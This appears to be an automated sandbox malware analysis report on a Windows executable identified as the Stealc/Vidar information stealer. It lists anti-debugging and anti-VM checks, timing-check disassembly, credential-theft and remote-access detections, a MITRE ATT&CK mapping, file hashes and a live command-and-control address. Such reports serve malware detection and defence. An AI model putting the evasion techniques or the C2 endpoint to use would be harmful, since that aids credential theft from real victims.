                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B4B7 second address: 95B4DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7F1D21A771h 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 ja 00007F7F1D21A766h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BE78 second address: 95BE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95BE7C second address: 95BE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95BE82 second address: 95BE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95C016 second address: 95C01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95C18E second address: 95C1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95C1AA second address: 95C1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95DB17 second address: 95DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95DB1B second address: 95DB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95DB1F second address: 95DB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F1CE19AB8h 0x0000000c jno 00007F7F1CE19AA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95F369 second address: 95F39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A775h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F1D21A770h 0x00000011 jnl 00007F7F1D21A766h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 95F39B second address: 95F3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007F7F1CE19AA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9622E9 second address: 9622ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9622ED second address: 96231A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F7F1CE19AA6h 0x0000000d pop edx 0x0000000e popad 0x0000000f nop 0x00000010 mov dx, CC1Eh 0x00000014 mov edx, eax 0x00000016 push dword ptr [ebp+1245F9CAh] 0x0000001c mov edx, dword ptr [ebp+122D2203h] 0x00000022 push 5AE600D1h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 96231A second address: 96231E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 96231E second address: 962324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9657C3 second address: 9657CD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1D21A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9657CD second address: 9657E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jne 00007F7F1CE19AA6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9657E3 second address: 9657E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9657E7 second address: 9657ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB02BC second address: 4FB02CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB02CB second address: 4FB02F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 jmp 00007F7F1CE19AB3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB02F4 second address: 4FB03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F7F1D21A774h 0x0000000d push eax 0x0000000e pushad 0x0000000f call 00007F7F1D21A771h 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 pop eax 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F7F1D21A772h 0x00000023 or cx, FBE8h 0x00000028 jmp 00007F7F1D21A76Bh 0x0000002d popfd 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007F7F1D21A76Bh 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d call 00007F7F1D21A76Bh 0x00000042 pop ecx 0x00000043 pushfd 0x00000044 jmp 00007F7F1D21A779h 0x00000049 sbb cx, BB66h 0x0000004e jmp 00007F7F1D21A771h 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB03E8 second address: 4FB0433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7F1CE19AAEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F7F1CE19AADh 0x00000019 jmp 00007F7F1CE19AB0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB0433 second address: 4FB0457 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1D21A770h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FB0457 second address: 4FB0466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 884D0A second address: 884D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6D1B2F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6CF2A2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6D1A42 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 87F861 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00484910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00484570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00483EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00471160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareVE
Source: file.exe, 00000000.00000002.1701335364.0000000001296000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13590
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13587
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13609
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13601
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13641
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004745C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00489750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00487850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6968, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00489600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00487B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00486920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00487850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00487A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6968, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6968, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix, listed by tactic column (numbers in parentheses are the counts shown in the original matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php2 | 17% | Virustotal |
http://185.215.113.37/ws | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.php( | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.php$ | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.php0 | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.php/ | 18% | Virustotal |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php2 | file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php0 | file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php$ | file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37a | file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php( | file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523253
Start date and time: 2024-10-01 11:06:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 86
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc | 185.215.113.37
| file.exe | malicious | Stealc, Vidar | 185.215.113.37
No context
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947435420181266
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'856'512 bytes
MD5: 7104794e5bc6d9668df3a837983e43df
SHA1: 6bbeef17a4443db7e332123055796aace85064d6
SHA256: e1eca91fddecc4eb0729d7a47e7950cd07bcfe3a195721c2ea132e79654a9fbf
SHA512: 292b4a7b45ee0217ffd846739053ea5eb62646123e1e755fb13489333cdf5c3d307e7d6e6cee3a0f60cffb2266e8c8874185f82b4ca7acbe0da8b92d91a7d60d
SSDEEP: 24576:9H0JnrSqDsGenZ2+XIRQQD3USAlNoMuXOZ67J4viv7PZ7eaZHfoht7wkT4vYYx:GJrmNnE+XfpnH0ttTP5D/oht7jcQ
TLSH: 9E8533A629AD71F1D9AC81FF0F6B3A70FF40D65325B8C41169151B6CE9322ADB3B3109
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xaa0000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax+eax*4], cl
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [edx], ecx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319
                  Name                                  Virtual Address  Virtual Size  Is in Section
